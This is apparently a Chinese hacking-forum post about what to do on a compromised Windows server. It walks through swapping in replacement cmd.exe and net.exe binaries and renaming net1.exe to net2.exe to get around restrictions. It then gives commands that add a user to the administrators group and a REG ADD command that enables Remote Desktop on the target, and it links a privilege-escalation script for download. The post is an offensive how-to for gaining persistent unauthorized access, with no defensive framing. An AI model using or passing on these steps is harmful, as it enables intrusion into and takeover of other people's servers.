第一:cmd命令无法打开
步骤:1:搜索cmd
windows\system32\dllcache\cmd.exe
windows\system32\cmd.exe
先删除windows\system32\dllcache目录下的cmd.exe
然后删除windows\system32\cmd.exe
上传自己系统自带的cmd.exe至windows\system32目录下!
如若cmd任然打不开
1:【暴力】重启机器
2:上传提权bat
第二:net net1命令无法使用!
步骤:1:搜索net或者net1
windows\system32\dllcache\net.exe
windows\system32\net.exe
先删除windows\system32\dllcache目录下的net.exe
然后删除windows\system32\net.exe
上传自己系统自带的net.exe至windows\system32目录下!
至于net1同上
上面比较傻
net2.exe
方法
把net1.exe改成net2.exe
直接上传到windows\system32\文件夹
提权命令:
net2 user 用户 密码 /add
net2 localgroup administrators 用户 /add
基本上命中率90%
第三:远程桌面3389
问题:连接远程桌面无法进入
考虑问题:
1:对方是否修改远程桌面3389的端口
方法:依次打开
-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
在右边查找PortNumber 看旁边是否为3389
2:如果是3389
运行cmd命令输入命令 netstat -an
看对方是否开打开了远程桌面设置
如若没有
输入以下命令!
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
基本上就能开了!如果不能开那就开不了
对于这样的服务器,利用!比较邪恶,直接远程桌面,咯咯~~~~
3:如果不是3389
远程桌面
比如:127.0.0.1:修改过的端口
如果进不了!看对方是否开打开了远程桌面设置
输入以下命令!
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
基本上就能开了!如果不能开那就开不了
网盘下载:[url]http://u.115.com/file/f7350b983f[/url]
